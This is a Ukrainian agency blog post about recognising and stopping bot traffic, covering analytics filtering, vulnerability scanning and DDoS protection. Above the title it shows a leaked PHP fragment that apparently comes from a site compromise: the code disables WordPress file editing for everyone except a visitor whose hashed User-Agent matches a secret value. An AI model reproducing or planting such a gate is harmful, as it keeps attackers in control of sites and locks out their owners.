if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Що таке бот-трафік та як його зупинити? у Києві, Україні за доступними цінами від агентства PATProfi

Що таке бот-трафік та як його зупинити?

Не весь трафік корисний для ресурсу. Власник може бачити постійну притоку відвідувачів на сайт, але варто пам’ятати, що в мережі домінує роботизований трафік. Важливо розуміти, що таке бот трафік, як можна запобігти, щоб сайту не завдавали шкоди.

Що таке бот-трафік?

Бот-трафіком є ​​будь-яке відвідування сайту, здійснене не людиною. Такий термін часто сприймають негативно, але не завжди трафік є поганим. Багатьом не до кінця зрозуміла сутність бот-трафіку. З цієї причини власникам порталів слід поставити питання, як визначити бот-трафік на сайті, які заходи необхідно вживати, щоб унеможливити сплески трафіку, здатні завдати шкоди його ресурсам за рахунок поглинання.

За даними статистики, обсяги негативного бот-трафіку стрімко зростають. Це пов’язано з тим, що він є найпоширенішою формою штучного трафіку. Цілком закономірним стає питання, чи необхідно власникам сайту робити неймовірні зусилля щодо боротьби з такою тенденцією, з урахуванням масштабування штучного інтелекту, появи різних автоматизованих сервісів, через які мережа охоплює з кожним днем ​​все більше роботів. Однозначної відповіді немає, так є різні види автоматизованих роботів, які здійснюють різні дії в мережі.

Бот-трафік на вашому сайті

Щоб контролювати роботизований трафік та керувати ним, необхідно розуміти, що кількість відвідувачів сайту щодня різна, і той факт, що роботи можуть сканувати сторінки-ресурси – це також нормально. Найпоширенішим форматом бот-трафіку можна вважати:

 • сканери пошукових систем;
 • інструменти
 • SEO;
 • боти для захисту авторських прав;
 • інший нешкідливий
 • автоматизований трафік.

Але в даний час зростає кількість шкідливих ботів, здатних завдати шкоди не тільки сайту, а й усьому бізнесу загалом. До них відносяться:

 • боти, що розсилають спам;
 • парсери;
 • DDoS-боти;
 • інші боти, які використовують сайт, щоб отримати незаконну вигоду для своїх творців.

Незважаючи на те, що цей процес відбувається без участі людини, поява робота на сайті вважається відвідуванням. Якщо не виявити бот-трафік і ніяк його не обмежити, то це негативно позначиться на аналітичних показниках:

 • перегляд сторінок;
 • показник відмови;
 • тривалість сеансу;
 • розташування користувачів;
 • наступна конверсія.

Через невідповідність у показниках власник сайту може заплутатися, а його продуктивність фактично неможливо буде визначити. Крім того, боти, які поєднуються з реальними відвідувачами, негативно відбиваються на веб-розробці, а саме на результатах A/B-тестування або на заходах спрямованих на оптимізацію конверсії.

Бот-трафік на вашому сайті

Для проведення найточнішого аналізу якості трафіку, щоб звести до мінімуму кількість будь-яких ботів, які можуть нашкодити сайту, рекомендується регулярно проводити сканування вразливостей та виявляти всі можливі проломи в безпеці ресурсу.

Завдяки скануванню вразливостей можна виявити та диференціювати слабкі місця у:

 • комунікаціях;
 • мережах;
 • обладнанні.

Це дозволить розрахувати ефективність та підібрати контрзаходи. Сканування може здійснюватися як внутрішнім IT-відділом чи зовнішньою організацією. З цим завданням чудово справляється такий інструмент сканування вразливостей, як Liquid Web.

Якщо замовляються послуги управління мережею у сторонніх провайдерів, то цілком очікувано, що він відстежуватиме оновлення та контролюватиме систему.

І якщо внутрішнім IT-відділом можливе проведення сканування вразливостей, то сторонній провайдер послуг має у своєму розпорядженні велику кількість ресурсів і часу для виконання такого інтенсивного процесу. Це зумовлено тим, що для сканування вразливостей потрібна велика пропускна здатність, що позитивно відбиватиметься на ефективності здійснюваного процесу. Якщо буде виявлено вразливість, персоналу буде необхідно знайти способи їх усунення, щоб убезпечити мережу належним чином.

Видалення ботів з даних аналітики

Багато власників сайтів використовують аналітичну інформацію з платформи типу Google Analytics. Це дозволить керувати потоками трафіку на сайті та зрозуміти, як можна оптимізувати сторінки.

Простий аналітичний інструментарій не здатний виявити бот-трафік під час аналізу даних, оскільки роботи мають доступ до сторінок, які здатні досліджувати їх як людина. Завдяки оновленню Google Analytics 4 з’явилася можливість автоматично визначати роботизований трафік та фільтрувати за допомогою доступної аналітичної інформації.

Слід зазначити, що бот-трафік не завжди приходить на сайт, щоб нашкодити йому, але він може вплинути на кількість відвідувачів вашого сайту і спотворити дані. У результаті, сторінки з низькою ефективністю, які приваблюють роботизований трафік, можуть залишатися такими.

В адміністративній панелі можна активувати функцію, яка дозволить фільтрувати трафік від живих користувачів та ботів. Такий функціонал працює таким чином, що автоматично виключає трафік, який вказаний у Міжнародному списку ботів, що складається Бюро інтерактивної реклами. Через те, що не всі роботи ще є в цьому списку, вони можуть пройти через фільтр. Але це ефективний та простий інструмент контролю показників сайту.

Ще одним чудовим аналітичним інструментом є Finteza. З його допомогою можна визначити різні форми бот-трафіку. Завдяки визначенню та класифікації роботизованого трафіку можна зрозуміти, звідки та з якою метою на сайт приходять шкідливі користувачі.

Якщо сайту не допомагають зміни, які були внесені на основі аналізу внутрішньої інформації, найімовірніше, слід скористатися досконалішими аналітичними системами, які дозволять дізнатися кількість відвідувачів вашого сайту та зрозуміти, наскільки реальним є трафік на ньому. Якщо підлаштовувати сторінки ресурси під запити роботів, то це може обернутися марною витратою ресурсів.

Захист від DDoS-атак

DDoS-ботнети є одними з найнебезпечніших форм роботизованого трафіку. DDoS-ботнет – це група пристроїв, підключених до Інтернету, які містять шкідливе програмне забезпечення та віддалено керуються без участі їх власників. Такі пристрої можуть одночасно використовувати різні зловмисники для своїх атак. Фактичний власник сайту, пристрою може не здогадуватися про те, що на ньому є шкідливе програмне забезпечення, що негативно позначається на його роботі.

Через часті DDoS-атаки сервер сайту починає перенасичуватися запитами, що робить ресурс повністю недоступним, призводить до суттєвих простоїв, втрати конверсій для сайтів, які використовуються в комерційних цілях. Сьогодні в мережі не важко знайти захист від DDoS-атак. Такий сервіс, як Liquid Web, готовий запропонувати різні рівні захисту DDoS-атак. Все залежить від потреб користувача.

Багато власників сайтів використовують програмне забезпечення для захисту від вірусів та шкідливих програм, проте при такому підході не завжди можна гарантувати захист від невідомих загроз, які проникли в систему. Для повного захисту серверів від негативного трафіку слід розглянути можливість застосування додаткових інструментів, таких як система виявлення вторгнень.

Програма Threat Stack збирає, відстежує та аналізує телеметрію безпеки в середовищі серверів для виявлення аномалій, а також оцінки загроз. Завдяки захисним заходам компанії відповідають стандартам безпеки, а також вимогам:

 • HIPAA/HITECH;
 • SOC 2;
 • PCI DSS.

Висновки

Кількість негативного роботизованого трафіку зростає з кожним днем. Компанії необхідно вчитися розпізнавати бот-трафік для кращого розуміння своїх показників та запобігання проникненню ботів у свої системи. Якщо правильно дотримуватись нормативних вимог, то можна виключити руйнівні загрози та вберегти свій сайт від зловмисних дій шахраїв.

hosting.pat@gmail.com

Leave a Comment

Ваша e-mail адреса не оприлюднюватиметься.